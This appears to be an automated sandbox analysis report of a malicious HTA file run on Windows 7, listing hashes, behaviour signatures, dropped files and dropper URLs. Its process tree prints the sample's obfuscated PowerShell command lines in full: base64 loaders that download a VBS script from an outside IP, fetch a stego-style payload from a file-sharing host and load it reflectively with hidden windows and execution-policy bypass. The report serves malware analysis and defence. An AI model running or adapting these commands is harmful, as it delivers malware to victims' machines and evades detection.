Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240708-en
  • resource tags

    arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system
  • submitted
    19-11-2024 02:05

General

  • Target

    0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4.hta

  • Size

    178KB

  • MD5

    2d71e3e87e2ea2945dcc2571b74fdb43

  • SHA1

    a338df9a850b1c37528e1b517786285c216cf5e0

  • SHA256

    0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4

  • SHA512

    8e9fca6b445cbec531540059dac5e287cef1e1f53e0c1afde7480e9bba3a0e4f532f7637bbf0dc79c34d179c3524fdccfc87933b00abd117a0437c59807dbeab

  • SSDEEP

    96:4vCl177OuKTWYEuKTGuC/TVjn0vflihuKTfuKTNAnuKTUQ:4vCld7OTTbETT5C/TCqTTfTTNeTTUQ

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

exe.dropper

https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Evasion via Device Credential Deployment 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 28 IoCs

Processes

  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\0557fb02097645b6ec955298be44333a49f07f61dbcfdce99a78038f1cd4c1d4.hta"
    1⤵
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Suspicious use of WriteProcessMemory
    PID:2160
    • C:\Windows\SysWOW64\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe
      "C:\Windows\SySTeM32\wIndOwSpOweRShELl\v1.0\pOWeRShelL.exe" "PoWeRShell -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE ; InVoKE-ExPrESsion($(iNvoKe-exPReSsION('[SySTEm.TEXT.enCodIng]'+[CHaR]0X3A+[CHAR]0X3a+'UTf8.gETsTring([SystEm.coNvErt]'+[CHaR]58+[CHar]58+'FroMBasE64sTRIng('+[chAR]0X22+'JFFVICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UWXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUmRFRklOaXRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVVJMTU9uLkRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNreXNEeixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBmeUF5YmEsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRmZIaEgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRqYyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBPbXF1aGx2bUJJKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAid2prT094RWxYIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNd3VyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRVTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk0LjE3MS4xMzgvMzI5L2NyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlbmdvb2QudElGIiwiJGVuVjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyIsMCwwKTtzdGFSVC1zbGVFcCgzKTtpRXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXGNyZWF0ZXRoZWJlc3R0aGluZ3N3aXRoZ29vZHRoaW5nc2Jlc3Rmb3JncmVhdHRoaW5nc2Zvcm1lZXZlLnZiUyI='+[chAr]34+'))')))"
      2⤵
      • Blocklisted process makes network request
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex BYpAss -nop -W 1 -c DevICecrEdenTiAlDepLOYMEnT.eXE
        3⤵
        • Evasion via Device Credential Deployment
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2780
      • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0r_ucbs9.cmdline"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
          C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6A39.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6A28.tmp"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3008
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1492
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdzSE5pbWFnZVVybCA9IGI0Rmh0dHBzOi8vMTAxJysnNy5maWxlbWFpbC5jb20vYXBpL2ZpbGUvZ2V0P2ZpbGVrZXk9MkFhX2JXbzlSZXU0NXQ3QlUxa1Znc2Q5cFQ5cGdTU2x2U3RHcm5USUNmRmhtVEtqM0xDNlNRdEljT2NfVDM1JysndyZwa192aWQ9ZmQ0ZjYxNGJiMjA5YzYyYzE3MzA5NDUxNycrJzZhMDkwNGYgYjRGO3NITndlYkNsJysnaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7cycrJ0hOaW1hZ2VCeXRlcyA9IHNITndlYkNsaWVudC5Eb3dubG8nKydhZERhdGEoc0hOaW1hZ2VVcmwpO3NITmltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ10nKyc6OlVURjguR2V0U3RyaW5nKHNITmltJysnYWdlQnl0ZXMpO3NITnN0YXJ0RmxhZyA9IGI0Rjw8QkFTRTY0X1NUQVJUPj5iNEY7c0hOZW5kRmxhZyA9ICcrJ2I0Rjw8QkFTRTY0X0VORD4+YjRGO3NITnN0YXJ0SW5kZXggPSBzSCcrJ05pbWFnZVRlJysneHQuSW5kZXhPZihzSE5zdGFydEZsYWcpO3NITmVuZEluZCcrJ2V4ID0gc0hOaW1hZ2VUZXh0LkluZGV4T2Yoc0hOZW5kRmxhZyk7c0hOc3RhcnRJbmRleCAtZ2UgMCAtYW5kIHNITmVuZEluZGV4IC1ndCBzSE5zdGFydCcrJ0luZGV4O3NITnN0JysnYXJ0SW5kZXggKz0gc0hOc3RhcnRGbGFnJysnLkxlbmd0aDtzSE5iYXNlJysnNjRMZW5ndGggPSBzSE5lbmRJbmRleCAtIHNITnN0YXJ0SW5kZXg7c0hOYmFzZTY0Q29tbWFuZCA9IHNITicrJ2knKydtYWdlVGV4dC5TdWJzdHJpbmcoc0hOc3RhcnRJbmRleCwgc0hOYmFzZTY0TGVuZ3RoKTtzSE5iYXNlNjRSZXZlcnNlZCA9IC1qb2luIChzSE5iYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgczdnIEZvckVhY2gtT2JqZWN0IHsgc0hOXyB9KVstMS4uLShzSE5iYXNlNjRDb21tYW5kLkxlbmd0aCldO3NITmNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTJysndHJpbmcoc0hOYmEnKydzZTY0UmV2ZXJzZWQpO3NITmxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCcrJyhzSE5jb21tYW5kQnl0ZXMpO3NITnZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoYjRGVkFJYjRGKTtzSE52YWlNZXRob2QuSW52bycrJ2tlKHNITm51bGwsIEAoYjRGdHh0LkVEU1NSRi85MjMvODMxLjE3MS40OS4zMi8vOnB0dGhiNEYsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RmRlc2F0aXZhZG9iNCcrJ0YsIGI0RmRlc2F0aXZhZG9iNEYsIGI0RkNhc1BvbCcrJ2I0RiwgYjRGZGVzYXRpdmFkb2I0RiwgYjRGZGVzYXRpdmFkb2InKyc0RixiNEZkZXNhdGl2YWQnKydvYjRGLGI0RmRlc2F0aXZhZG9iNEYsYjRGZGVzYXRpdmFkb2I0RixiNEZkZXNhdGl2YWRvYjRGLGI0RmRlc2F0aXZhZG9iJysnNEYsYjRGMWI0RixiNEZkZXNhdGl2YWRvYjRGKSk7JykuUkVwbGFDZSgnYjRGJyxbc1RySW5nXVtDSGFyXTM5KS5SRXBsYUNlKCdzSE4nLCckJykuUkVwbGFDZSgnczdnJywnfCcpIHwmICggJFBzaG9tZVs0XSskUFNIT21FWzMwXSsnWCcp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2204
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('sHNimageUrl = b4Fhttps://101'+'7.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35'+'w&pk_vid=fd4f614bb209c62c173094517'+'6a0904f b4F;sHNwebCl'+'ient = New-Object System.Net.WebClient;s'+'HNimageBytes = sHNwebClient.Downlo'+'adData(sHNimageUrl);sHNimageText = [System.Text.Encoding]'+'::UTF8.GetString(sHNim'+'ageBytes);sHNstartFlag = b4F<<BASE64_START>>b4F;sHNendFlag = '+'b4F<<BASE64_END>>b4F;sHNstartIndex = sH'+'NimageTe'+'xt.IndexOf(sHNstartFlag);sHNendInd'+'ex = sHNimageText.IndexOf(sHNendFlag);sHNstartIndex -ge 0 -and sHNendIndex -gt sHNstart'+'Index;sHNst'+'artIndex += sHNstartFlag'+'.Length;sHNbase'+'64Length = sHNendIndex - sHNstartIndex;sHNbase64Command = sHN'+'i'+'mageText.Substring(sHNstartIndex, sHNbase64Length);sHNbase64Reversed = -join (sHNbase64Command.ToCharArray() s7g ForEach-Object { sHN_ })[-1..-(sHNbase64Command.Length)];sHNcommandBytes = [System.Convert]::FromBase64S'+'tring(sHNba'+'se64Reversed);sHNloadedAssembly = [System.Reflection.Assembly]::Load'+'(sHNcommandBytes);sHNvaiMethod = [dnlib.IO.Home].GetMethod(b4FVAIb4F);sHNvaiMethod.Invo'+'ke(sHNnull, @(b4Ftxt.EDSSRF/923/831.171.49.32//:ptthb4F, b4Fdesativadob4F, b4Fdesativadob4'+'F, b4Fdesativadob4F, b4FCasPol'+'b4F, b4Fdesativadob4F, b4Fdesativadob'+'4F,b4Fdesativad'+'ob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob4F,b4Fdesativadob'+'4F,b4F1b4F,b4Fdesativadob4F));').REplaCe('b4F',[sTrIng][CHar]39).REplaCe('sHN','$').REplaCe('s7g','|') |& ( $Pshome[4]+$PSHOmE[30]+'X')"
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2664

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\0r_ucbs9.dll

    Filesize

    3KB

    MD5

    767bf44ba9c609075ddda623742d2fe8

    SHA1

    bf6efae91fff85fb9cfcf749f3e0e16027a91792

    SHA256

    8f5ecb1006500b5f39e0788de73b612d7fe145e7250ea8a87cc7c34a701c068f

    SHA512

    3366cc8dff0f8588dbd514255c9f82f726e53579a7653dea7ee652a4fecae6fc599bfcdcf05b2dbca0ba6b144eaf9cac123cb26d11b3860d95e69e19f84d105d

  • C:\Users\Admin\AppData\Local\Temp\0r_ucbs9.pdb

    Filesize

    7KB

    MD5

    01034a9743c0edc785e75346d8d39bb2

    SHA1

    078fa700e85de023b1a731263bba65519ebb2d7b

    SHA256

    4b774f4b2a080f9853d3a5d0a9d9e1d0a10525807c22cbd8780305f24181cbfa

    SHA512

    23d4698074c463a46553cc638aa5e30fe263126930f18c0dcc1a918597603225ea295bacf5f5a78aed0efc48deedd0d9084df8597149e60b24baea7fcc0d84c4

  • C:\Users\Admin\AppData\Local\Temp\RES6A39.tmp

    Filesize

    1KB

    MD5

    d25987d8438abe714827ac62d8b950de

    SHA1

    8ccccd20e519974903c46644ffc09aa52fede027

    SHA256

    8a0c6bb1c776b9fe3720b7a13ba1c15e491f96cf3cccc8607644a1d9ec2c4747

    SHA512

    af9105712b5c64471b2af69a504877f616ea56ad8d6029bf65608b5c66ae7853d8109c1be43477e5a3a9596b4c9d16a92617a1143e5c55bf10a85582c9896978

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

    Filesize

    7KB

    MD5

    3c11d8a94421577fe09da74cfdd9fc82

    SHA1

    f0dba31d12bfdd4fee9e4eedc9a46aec49d2d449

    SHA256

    c97fc495354163d336d4ae1efa8d306348280fcbf540192295532a4f6386c007

    SHA512

    b9229d1cdb169e0999e8636491eb78bca583e32cbe5e9598a9a6d6c009efd0b53ba457436898b604bf27e93a39aaec564aa36e4a12faf8b924fd5c9c56d01ca9

  • C:\Users\Admin\AppData\Roaming\createthebestthingswithgoodthingsbestforgreatthingsformeeve.vbS

    Filesize

    137KB

    MD5

    c9b675b1514c024221535d4bde6f6c69

    SHA1

    24594969bc105aec0e15f109872193c030c0c102

    SHA256

    e58ba960c159e99a12d4c50d3fffe4a9ee2b50f08e702bc90d4e18b7aa9421fb

    SHA512

    328e530eb7abb045624d793faf89ccc1a16e0c1a1c58e3a33d2cb4bd955742d511f3b07d183423a7643a57579cdd0591d968640d106fad5d1c6a4b1ad4c494d8

  • \??\c:\Users\Admin\AppData\Local\Temp\0r_ucbs9.0.cs

    Filesize

    480B

    MD5

    c66e77d41af1843e35b6467cc2482922

    SHA1

    f224cac3dd486ac45f0debd3ec7343bb3150d1d3

    SHA256

    c9d35df0658d18e1f5a467fe8aacc3da8baff1681fc5b95efbc7b4325df1595d

    SHA512

    7c3bc95eb54636a65790070923b7fcb41cac1cb38570d2803448c36ce7048cb920f03a6c33db48237b4a317795d4c4895b97091fee12e947efb1d7547c4a1c4b

  • \??\c:\Users\Admin\AppData\Local\Temp\0r_ucbs9.cmdline

    Filesize

    309B

    MD5

    0e9146b0f4de2ec6825da0fa10f32882

    SHA1

    93cad204490d3cfba6bb002a445d2c3bbd487e8f

    SHA256

    b60f7cdd8c259b94cf95b2413d7d02ef42bfdd902ec1d0dbec9d0aea1fa5374e

    SHA512

    aa598eae675ab2486b0826203e787bf05fb354f31e12c9a2077112d9d5622bd21f5caea4ef5a8b76d45af8918f6aef54f2f6c3c1b288379801127217b6a88c6d

  • \??\c:\Users\Admin\AppData\Local\Temp\CSC6A28.tmp

    Filesize

    652B

    MD5

    b61c62fd1cef13eb0297e1e6909c0371

    SHA1

    384c0a06572ee89bae3ea452c83bb7fb80095e60

    SHA256

    4c0c7d78cde0d06ca30b2a8f74aab792efc4d9ad4073c6d413abdccf351a0b55

    SHA512

    e19c9181d1bb068430fd826407a38f2d1220f8b817b5dd1db0f6dcff95eb273b79977a8de5161de0e2cf7c80716dacdba061d1f76f9fd8cfd9cd03b8c3650fcb